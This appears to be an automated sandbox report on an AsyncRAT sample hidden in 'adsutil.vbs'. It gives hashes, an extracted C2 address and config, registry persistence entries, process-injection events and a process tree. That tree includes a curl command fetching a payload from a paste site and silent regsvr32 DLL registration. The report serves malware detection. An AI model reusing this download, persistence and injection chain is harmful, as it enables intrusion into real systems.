asyncrat | c7e08a1387ca0de53b3df7f03494c34eacbdd651ca1056f4abf8fd4c87cadb10

Analysis

max time kernel
140s
max time network
159s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
02/03/2024, 02:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

adsutil.vbs
Size

96KB
MD5

40783c2ee0f33af59955a012b68a9923
SHA1

edf2d5838d271bdc982eecbb24e3d9e5ef715a81
SHA256

4f49f96a32e4fb64cd6c103ce99a381673988bbd6b83ed8594973aa9ae760f56
SHA512

aa916093f80fbc8015b845fd21cefc2b3d71d85b02d2ace07efa3c16ace4710c46bee46c5303d97812f6172203d1a666a8edbf9948c770fda4ac123e09ce8887
SSDEEP

768:8A9i5H/CZoH5RUt4VXZzZq3Wib0aWV8BaKa0BEfEMWDIcVEKu:d9i5H/CZozqxnVEKu

Score

10^/10

asyncrat kalelgato persistence rat

Malware Config

Extracted

Family

asyncrat

Version

1.0.7

Botnet

KALELGATO

141.95.84.40:4291

Mutex

askaskaskas

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\Control Panel\International\Geo\Nation	cscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\Control Panel\International\Geo\Nation	WScript.exe

Loads dropped DLL 8 IoCs

pid	Process
4644	regsvr32.exe
1940	wscript.exe
3792	regsvr32.exe
2180	regsvr32.exe
660	regsvr32.exe
4228	cscript.exe
332	regsvr32.exe
3744	regsvr32.exe

Registers COM server for autorun 1 TTPs 12 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dynwrapx.dll"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dynwrapx.dll"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dynwrapx.dll"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dynwrapx.dll"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dynwrapx.dll"	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dynwrapx.dll"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32	regsvr32.exe

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 1940 set thread context of 4520	1940	wscript.exe	97
PID 1940 set thread context of 1480	1940	wscript.exe	100
PID 1940 set thread context of 4092	1940	wscript.exe	104
PID 4228 set thread context of 4940	4228	cscript.exe	109
PID 4228 set thread context of 4832	4228	cscript.exe	111
PID 4228 set thread context of 1088	4228	cscript.exe	113

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
2872	1480	WerFault.exe	100

Modifies registry class 28 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dynwrapx.dll"	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\DynamicWrapperX\CLSID\ = "{89565275-A714-4a43-912E-978B935EDCCC}"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\WOW6432Node	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\DynamicWrapperX\CLSID\ = "{89565275-A714-4a43-912E-978B935EDCCC}"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\DynamicWrapperX\CLSID	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\DynamicWrapperX\CLSID\ = "{89565275-A714-4a43-912E-978B935EDCCC}"	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\DynamicWrapperX\CLSID\ = "{89565275-A714-4a43-912E-978B935EDCCC}"	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dynwrapx.dll"	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\DynamicWrapperX\CLSID\ = "{89565275-A714-4a43-912E-978B935EDCCC}"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dynwrapx.dll"	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dynwrapx.dll"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\DynamicWrapperX\CLSID	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dynwrapx.dll"	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\DynamicWrapperX\CLSID\ = "{89565275-A714-4a43-912E-978B935EDCCC}"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\DynamicWrapperX\CLSID	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\DynamicWrapperX\CLSID	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dynwrapx.dll"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\DynamicWrapperX\CLSID	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\DynamicWrapperX	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\DynamicWrapperX\CLSID	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\WOW6432Node\CLSID	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\WOW6432Node\CLSID\{89565275-A714-4a43-912E-978B935EDCCC}\InProcServer32	regsvr32.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4520	aspnet_compiler.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1092 wrote to memory of 4280	1092	WScript.exe	87
PID 1092 wrote to memory of 4280	1092	WScript.exe	87
PID 1092 wrote to memory of 1940	1092	WScript.exe	92
PID 1092 wrote to memory of 1940	1092	WScript.exe	92
PID 1092 wrote to memory of 1940	1092	WScript.exe	92
PID 1940 wrote to memory of 3196	1940	wscript.exe	93
PID 1940 wrote to memory of 3196	1940	wscript.exe	93
PID 1940 wrote to memory of 3196	1940	wscript.exe	93
PID 1940 wrote to memory of 4644	1940	wscript.exe	96
PID 1940 wrote to memory of 4644	1940	wscript.exe	96
PID 1940 wrote to memory of 4644	1940	wscript.exe	96
PID 1940 wrote to memory of 4520	1940	wscript.exe	97
PID 1940 wrote to memory of 4520	1940	wscript.exe	97
PID 1940 wrote to memory of 4520	1940	wscript.exe	97
PID 1940 wrote to memory of 4520	1940	wscript.exe	97
PID 1940 wrote to memory of 4520	1940	wscript.exe	97
PID 1940 wrote to memory of 4520	1940	wscript.exe	97
PID 1940 wrote to memory of 4520	1940	wscript.exe	97
PID 1940 wrote to memory of 4520	1940	wscript.exe	97
PID 1940 wrote to memory of 3792	1940	wscript.exe	98
PID 1940 wrote to memory of 3792	1940	wscript.exe	98
PID 1940 wrote to memory of 3792	1940	wscript.exe	98
PID 1940 wrote to memory of 1480	1940	wscript.exe	100
PID 1940 wrote to memory of 1480	1940	wscript.exe	100
PID 1940 wrote to memory of 1480	1940	wscript.exe	100
PID 1940 wrote to memory of 1480	1940	wscript.exe	100
PID 1940 wrote to memory of 2180	1940	wscript.exe	102
PID 1940 wrote to memory of 2180	1940	wscript.exe	102
PID 1940 wrote to memory of 2180	1940	wscript.exe	102
PID 1940 wrote to memory of 4092	1940	wscript.exe	104
PID 1940 wrote to memory of 4092	1940	wscript.exe	104
PID 1940 wrote to memory of 4092	1940	wscript.exe	104
PID 1940 wrote to memory of 4092	1940	wscript.exe	104
PID 1940 wrote to memory of 4092	1940	wscript.exe	104
PID 1940 wrote to memory of 4092	1940	wscript.exe	104
PID 1940 wrote to memory of 4092	1940	wscript.exe	104
PID 1940 wrote to memory of 4092	1940	wscript.exe	104
PID 1940 wrote to memory of 4228	1940	wscript.exe	105
PID 1940 wrote to memory of 4228	1940	wscript.exe	105
PID 1940 wrote to memory of 4228	1940	wscript.exe	105
PID 4228 wrote to memory of 464	4228	cscript.exe	107
PID 4228 wrote to memory of 464	4228	cscript.exe	107
PID 4228 wrote to memory of 464	4228	cscript.exe	107
PID 4228 wrote to memory of 660	4228	cscript.exe	108
PID 4228 wrote to memory of 660	4228	cscript.exe	108
PID 4228 wrote to memory of 660	4228	cscript.exe	108
PID 4228 wrote to memory of 4940	4228	cscript.exe	109
PID 4228 wrote to memory of 4940	4228	cscript.exe	109
PID 4228 wrote to memory of 4940	4228	cscript.exe	109
PID 4228 wrote to memory of 4940	4228	cscript.exe	109
PID 4228 wrote to memory of 4940	4228	cscript.exe	109
PID 4228 wrote to memory of 4940	4228	cscript.exe	109
PID 4228 wrote to memory of 4940	4228	cscript.exe	109
PID 4228 wrote to memory of 4940	4228	cscript.exe	109
PID 4228 wrote to memory of 332	4228	cscript.exe	110
PID 4228 wrote to memory of 332	4228	cscript.exe	110
PID 4228 wrote to memory of 332	4228	cscript.exe	110
PID 4228 wrote to memory of 4832	4228	cscript.exe	111
PID 4228 wrote to memory of 4832	4228	cscript.exe	111
PID 4228 wrote to memory of 4832	4228	cscript.exe	111
PID 4228 wrote to memory of 4832	4228	cscript.exe	111
PID 4228 wrote to memory of 4832	4228	cscript.exe	111
PID 4228 wrote to memory of 4832	4228	cscript.exe	111
PID 4228 wrote to memory of 4832	4228	cscript.exe	111

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\adsutil.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1092
- C:\Windows\System32\curl.exe
  curl -s https://paste.ee/r/mEx8g
  2⤵
  PID:4280
- C:\Windows\SysWOW64\wscript.exe
  "C:\Windows\SysWOW64\wscript.exe" //b //e:vbscript "C:\Users\Admin\AppData\Local\Temp\adsutil.vbs"
  2⤵
  - Checks computer location settings
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:1940
- - C:\Windows\SysWOW64\curl.exe
    curl -s https://paste.ee/r/mEx8g
    3⤵
    PID:3196
- - C:\Windows\SysWOW64\regsvr32.exe
    "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll"
    3⤵
    - Loads dropped DLL
    - Registers COM server for autorun
    - Modifies registry class
    PID:4644
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4520
- - C:\Windows\SysWOW64\regsvr32.exe
    "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll"
    3⤵
    - Loads dropped DLL
    - Registers COM server for autorun
    - Modifies registry class
    PID:3792
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    PID:1480
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1480 -s 80
      4⤵
      Program crash
      PID:2872
- - C:\Windows\SysWOW64\regsvr32.exe
    "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll"
    3⤵
    - Loads dropped DLL
    - Registers COM server for autorun
    - Modifies registry class
    PID:2180
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    PID:4092
- - C:\Windows\SysWOW64\cscript.exe
    "C:\Windows\System32\cscript.exe" //nologo C:\Users\Admin\AppData\Local\Temp\adsutil.vbs
    3⤵
    - Checks computer location settings
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:4228
  - - C:\Windows\SysWOW64\curl.exe
      curl -s https://paste.ee/r/mEx8g
      4⤵
      PID:464
  - - C:\Windows\SysWOW64\regsvr32.exe
      "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll"
      4⤵
      Loads dropped DLL
      Registers COM server for autorun
      Modifies registry class
      PID:660
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
      4⤵
      PID:4940
  - - C:\Windows\SysWOW64\regsvr32.exe
      "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll"
      4⤵
      Loads dropped DLL
      Registers COM server for autorun
      Modifies registry class
      PID:332
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
      4⤵
      PID:4832
  - - C:\Windows\SysWOW64\regsvr32.exe
      "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll"
      4⤵
      Loads dropped DLL
      Registers COM server for autorun
      Modifies registry class
      PID:3744
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
      4⤵
      PID:1088

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 1480 -ip 1480
1⤵
PID:3560

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3556

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\aspnet_compiler.exe.log

Filesize
425B

MD5
4eaca4566b22b01cd3bc115b9b0b2196

SHA1
e743e0792c19f71740416e7b3c061d9f1336bf94

SHA256
34ba0ab8d1850e7825763f413142a333ccbc05fa2b5499a28a7d27b8a1c5b4bb

SHA512
bc2b1bf45203e3bb3009a7d37617b8f0f7ffa613680b32de2b963e39d2cf1650614d7035a0cf78f35a4f5cb17a2a439e2e07deaefd2a4275a62efd0a5c0184a1

Download Submit
C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll

Filesize
13KB

MD5
e0b8dfd17b8e7de760b273d18e58b142

SHA1
801509fb6783c9e57edc67a72dde3c62080ffbaf

SHA256
4ef3a6703abc6b2b8e2cac3031c1e5b86fe8b377fde92737349ee52bd2604379

SHA512
443359da27b3c87e81ae4f4b9a2ab7e7bf6abfa93551fc62347a0b79b36d79635131abc14d4deddab3ace12fdf973496518f67e1be8dc4903b35fd465835556b

Download Submit
memory/1088-42-0x0000000005310000-0x0000000005320000-memory.dmp

Filesize
64KB

Download
memory/1088-45-0x0000000073360000-0x0000000073B10000-memory.dmp

Filesize
7.7MB

Download
memory/1088-40-0x0000000073360000-0x0000000073B10000-memory.dmp

Filesize
7.7MB

Download
memory/1940-8-0x00000000048D0000-0x00000000048D1000-memory.dmp

Filesize
4KB

Download
memory/1940-12-0x0000000004AD0000-0x0000000004AD1000-memory.dmp

Filesize
4KB

Download
memory/1940-4-0x00000000046F0000-0x00000000046F1000-memory.dmp

Filesize
4KB

Download
memory/1940-36-0x00000000048D0000-0x00000000048D1000-memory.dmp

Filesize
4KB

Download
memory/1940-31-0x00000000046F0000-0x00000000046F1000-memory.dmp

Filesize
4KB

Download
memory/4092-13-0x0000000073360000-0x0000000073B10000-memory.dmp

Filesize
7.7MB

Download
memory/4092-15-0x0000000005150000-0x0000000005160000-memory.dmp

Filesize
64KB

Download
memory/4092-20-0x0000000073360000-0x0000000073B10000-memory.dmp

Filesize
7.7MB

Download
memory/4228-38-0x0000000004BB0000-0x0000000004BB1000-memory.dmp

Filesize
4KB

Download
memory/4228-30-0x0000000004A00000-0x0000000004A01000-memory.dmp

Filesize
4KB

Download
memory/4228-23-0x0000000004630000-0x0000000004631000-memory.dmp

Filesize
4KB

Download
memory/4520-33-0x0000000073360000-0x0000000073B10000-memory.dmp

Filesize
7.7MB

Download
memory/4520-27-0x00000000754B0000-0x00000000754C2000-memory.dmp

Filesize
72KB

Download
memory/4520-22-0x0000000005E50000-0x0000000005EB6000-memory.dmp

Filesize
408KB

Download
memory/4520-49-0x0000000007510000-0x00000000075A2000-memory.dmp

Filesize
584KB

Download
memory/4520-5-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/4520-48-0x0000000007370000-0x000000000738E000-memory.dmp

Filesize
120KB

Download
memory/4520-21-0x0000000006390000-0x0000000006934000-memory.dmp

Filesize
5.6MB

Download
memory/4520-47-0x0000000006360000-0x0000000006370000-memory.dmp

Filesize
64KB

Download
memory/4520-19-0x0000000005D40000-0x0000000005DDC000-memory.dmp

Filesize
624KB

Download
memory/4520-14-0x0000000005810000-0x0000000005820000-memory.dmp

Filesize
64KB

Download
memory/4520-46-0x00000000073C0000-0x0000000007436000-memory.dmp

Filesize
472KB

Download
memory/4520-7-0x0000000073360000-0x0000000073B10000-memory.dmp

Filesize
7.7MB

Download
memory/4520-44-0x0000000005810000-0x0000000005820000-memory.dmp

Filesize
64KB

Download
memory/4832-32-0x0000000073360000-0x0000000073B10000-memory.dmp

Filesize
7.7MB

Download
memory/4832-43-0x0000000073360000-0x0000000073B10000-memory.dmp

Filesize
7.7MB

Download
memory/4832-37-0x0000000004C50000-0x0000000004C60000-memory.dmp

Filesize
64KB

Download
memory/4940-41-0x0000000073360000-0x0000000073B10000-memory.dmp

Filesize
7.7MB

Download
memory/4940-34-0x0000000005600000-0x0000000005610000-memory.dmp

Filesize
64KB

Download
memory/4940-26-0x0000000073360000-0x0000000073B10000-memory.dmp

Filesize
7.7MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads